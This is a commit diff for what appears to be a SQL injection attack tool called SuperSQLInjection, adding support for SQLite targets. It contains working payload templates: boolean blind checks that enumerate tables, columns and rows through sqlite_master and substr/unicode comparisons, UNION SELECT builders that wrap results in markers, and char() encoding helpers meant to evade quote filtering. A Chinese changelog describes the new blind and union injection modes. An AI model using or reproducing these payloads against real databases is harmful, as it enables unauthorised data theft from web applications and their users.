// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.2019.01.02")]
[assembly: AssemblyFileVersion("1.2019.01.02")]
[assembly: AssemblyVersion("1.2019.01.04")]
[assembly: AssemblyFileVersion("1.2019.01.04")]

1
SuperSQLInjection/SuperSQLInjection.csproj
View File

@@ -143,6 +143,7 @@
<Compile Include="payload\Access.cs" />
<Compile Include="payload\Comm.cs" />
<Compile Include="model\Injection.cs" />
<Compile Include="payload\SQLite.cs" />
<Compile Include="payload\DBPayload.cs" />
<Compile Include="payload\DB2.cs" />
<Compile Include="payload\PostgreSQL.cs" />

3
SuperSQLInjection/model/DBType.cs
View File

@@ -13,6 +13,7 @@ namespace SuperSQLInjection.model
SQLServer = 3,
Oracle = 4,
PostgreSQL=5,
DB2 = 6
DB2 = 6,
SQLite=7
}
}

97
SuperSQLInjection/payload/SQLite.cs Normal file
View File

@@ -0,0 +1,97 @@
using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class SQLite
{
//加载对应配置(需要读取的环境变量)
public static String path = "config/vers/sqlite.txt";
public static List<String> vers = FileTool.readFileToList(path);
//表数量
public static String tables_count = "(select count(1) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101))";
//获取表名称
public static String table_value = "(select tbl_name from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) limit 1 offset {index})";
//获取列名称
public static String column_value = "(select substr(sql,instr(sql,char(40))) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) and tbl_name='{table}')";
//获取表数量bool
public static String bool_tables_count = " " + tables_count + ">{len}";
//bool方式字符长度判断
public static String bool_length = " length({data})>{len}";
public static String check_li_value = " length({data})<{len}";
//bool方式获取值
public static String bool_value = " unicode(substr({data},{index},1))>{len}";
//bool方式获取值
public static String bool_noUnicode_value = "{data}>{len}";
public static String unicode_value = " unicode(substr({data},{index},1))";
//获取行数据
public static String data_value = "(select {data} from {table} limit 1 offset {index})";
//union获取数据条数
public static String data_count = "(select count(1) from {table})";
public static String bool_datas_count = " " + data_count + ">={len}";
//union获取值
public static String union_value = " 1=2 union all select {data}";
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "char(94)||char(94)||char(33)||" + Comm.unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append("(char(94)||char(94)||char(33)||" + dataPayLoad + "||char(33)||char(94)||char(94)),");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getBoolDataPayLoad(String column, List<String> columns, String dbName, String table, int index)
{
String data = data_value.Replace("{data}", column).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{orderby}", columns[0]);
String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
return payload;
}
}
}

24
SuperSQLInjection/tools/Tools.cs
View File

@@ -683,6 +683,17 @@ namespace tools
return "";
}
public static String strToChar(String str,String encode,String joinStr)
{
return strToChrOrChar(str, "char", joinStr, encode);
}
public static String strToChr(String str, String encode, String joinStr)
{
return strToChrOrChar(str, "chr", joinStr, encode);
}
/// <summary>
/// 转换chr供SQLServer替换库名防止单引号被拦截或过滤
/// </summary>
@@ -1213,6 +1224,19 @@ namespace tools
}
}
}
public static List<String> GetSQLiteColumns(String sql)
{
List<String> list = new List<String>();
MatchCollection mc =Regex.Matches(sql, "\"(?<column>\\w+)\"[\\w ]+\\,");
if (mc!=null&&mc.Count > 0) {
foreach (Match m in mc) {
list.Add(m.Groups["column"].Value);
}
}
return list;
}
}

7
update.txt
View File

@@ -1,4 +1,9 @@
20190102 V1.0 正式版---
20190104 V1.0 正式版---
修复SQLServer盲注由于表名替换错误导致列获取不成功的问题。
优化配置文件。
新增支持SQLite数据库的注入支持盲注和Union方式暂不支持显错模式,SQLite支持3以上版本如果是3以下版本由于不支持部分函数可能无法获取数据。
20190102 V1.0 正式版---
修复order by判断成功列数后还是按照默认最大列数进行测试的问题。
修复字符替换时,将字符全转小写后在替换,导致部分情况下可能导致语句出错。
优化环境变量显示方式,可以选择想要获取的环境变量进行获取。

BIN
超级SQL注入工具使用说明书V1.1 2018117.docx
View File

Binary file not shown.